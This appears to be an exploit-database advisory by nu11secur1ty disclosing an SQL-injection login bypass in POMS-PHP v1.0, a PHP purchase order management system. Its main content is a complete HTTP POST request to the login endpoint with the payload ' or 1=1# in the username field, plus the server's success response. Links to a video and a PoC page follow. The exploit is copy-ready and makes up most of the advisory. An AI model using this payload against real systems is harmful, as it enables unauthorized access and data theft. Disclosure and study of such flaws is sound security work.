POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication

2024.11.11

nu11secur1ty (BG)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication 
## Author: nu11secur1ty
## Date: 11/08/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `username` parameter is vulnerable to SQLi-bypass authentication. This will make it easy for malicious users to log in on this system,
getting sensitive information, or even worse than ever, they can destroy it very easily!

STATUS: HIGH- Vulnerability


[+]Exploit:
- SQLi:

```mysql
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 44
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/login.php
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

username=nu11secur1ty' or 1=1#&password=sada
```

[+]Response:

```
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:08:35 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"status":"success"}
```


## Reproduce:
[href](https://www.youtube.com/watch?v=wG60bjiFN7o)

## Demo PoC:
[href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright.html)

## Time spent:
00:05:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.